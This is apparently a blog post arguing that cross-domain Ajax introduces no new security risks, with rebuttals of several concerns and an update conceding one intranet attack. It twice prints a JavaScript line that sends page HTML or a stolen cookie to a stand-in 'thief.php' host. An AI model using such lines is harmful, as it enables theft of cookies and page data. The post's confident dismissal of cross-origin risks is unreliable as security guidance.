Debunking Strong Misconceptions About Cross-Domain Ajax Security Issues
Quite a number of people have been discussing possible cross-domain Ajax security issues recently. These are smart people that generally know their technologies very well, but for some reason are missing some fundamental aspects about Ajax. Here are a few articles that I am referring to.
- Cross Domain XHR
- Ajax: Is talking to outside domains safe?
- Cross-Domain Ajax. Security Implications in Depth
To recap the issues mentioned in these articles.
- Resource Theft: Does allowing cross-domain Ajax enable theft of resources from intranets and the like?
- Cross Site Scripting: Does allowing cross-domain Ajax enable new cross site scripting attacks?
- Slow 3rd Party Web Sites: What if your server is in the US, the client is in the US, and the remote service is in India?
- Slowing down other peoples sites: What if you use many Ajax calls to try to shut down another person's site?
- Session data: If the client can hold session data, then we may be able to open up requests to outside domains, but we would have to some how secure this new data transfer or will see bigger holes for people to attack.
- If you allow cross-site ajax, can a malicious web page can perform actions as if you are logged in at that site?
- What about trusted domains? Wouldn't it be great to be able to say "mydomain.com trusts yourdomain.com and hisdomain.com" similar to Flash's crossdomain.xml policy file.
I will talk about each of these issues in turn, but the core of every point stem from the same thing. Ajax grabs text data from a server the way that the image tags grab image data from a server. Ajax inherently does not execute any of the text it receives. In fact, as the latest Windows image rendering overflow shows, it can actually be a bigger security risk to show a malicious image on a web page than it would ever be to grab text with Ajax.
(new Image()).src = "http://remotesite.com/thief.php?data=" + encodeURIComponent(document.body.innerHTML);
Cross Site Scripting
This is the funniest of all security concerns about Ajax, since as mentioned many times already, unless you call eval yourself (in which case I hope you are prepared for the results yourself, it has nothing to do with Ajax) Ajax is as innocuous as putting an image from a remote site on your site. No remote scripts are executed by default in Ajax.
Slow 3rd Party Web Sites
If you are requesting text from Russia it might take the page longer to load. If you are requesting an image from Russia it might take the page longer to load. No difference. The name of the game is embedding remote resources wisely, not banning a very useful technology because it can be used in a dumb way.
Slowing down other peoples sites
Again, this is just as easy without cross-domain Ajax as it is with cross-domain Ajax. You could just as easily create dynamic iframes, images, and scripts to accomplish the same end and there are no restrictions in place to stop that family of attacks.
This actually falls into the same category as resource theft. Cross-domain Ajax does not introduce any new security issues that you don't have access to today.
Performing actions as if you are logged in
Cookie's are protected against cross-domain access and cross-domain Ajax would not circumvent that at all. A malicious site accessing your site would not have access to your cookies no matter how hard it tried, cross-domain Ajax would not change that. One might ask: well what if somehow the cookie is highjacked? Doesn't Ajax make it easier to send? No, no it does not.
(new Image()).src = "http://remotesite.com/thief.php?data=" + encodeURIComponent(hijacked_cookie);
Some people think that one should require explicit permission to have cross-domain Ajax access to sites. I ask those people why? I don't need permission to curl your site. I don't need permission to embed images from your site into mine. I don't need permission to include scripts from your site. I don't need permission to include iframes that link to your site. Why should I need permission to grab text data from your website from within my site?
If there are any more concerns about cross-domain Ajax that I am missing, please comment. At this moment I can see nothing that makes a difference to security by allowing cross-domain Ajax. Safari already allows cross-domain Ajax (thank you Apple!). I can not wait for the IE and Firefox people to figure out their fears are baseless.
IMPORTANT UPDATE: A Real Concern is Found
Patrick Breitenbach was able to find one single security implication, but it only works if all of the following conditions are satisfied:
- POSTs are required (note that unfortunately the vast majority of web applications don't care one way or the other)
- the attacker knows, at the very least, the intranet URL
- the attacker gets someone inside the intranet to visit that malicious site that targets their particular intranet software
- the intranet has no form of internal authentication
- the intranet does not check referrers to make sure that the POST comes from a form inside the intranet
If all of those are true, the attacker could have access to slightly more information on the intranet than he could have right now. There are a lot of conditions for this exploit, but the gist of it is you have to have crappy intranet software targeted directly by people with intimate knowledge of your particular intranet system in order for this to make any difference.
Compared to the amazing possible gains of enabling cross-domain Ajax, this seems like way too small of a concern to make a difference. Is this really the only thing holding Firefox and IE from allowing it?
You should follow me on twitter here.
Technoblog reader special: click here to get $10 off web hosting by FatCow!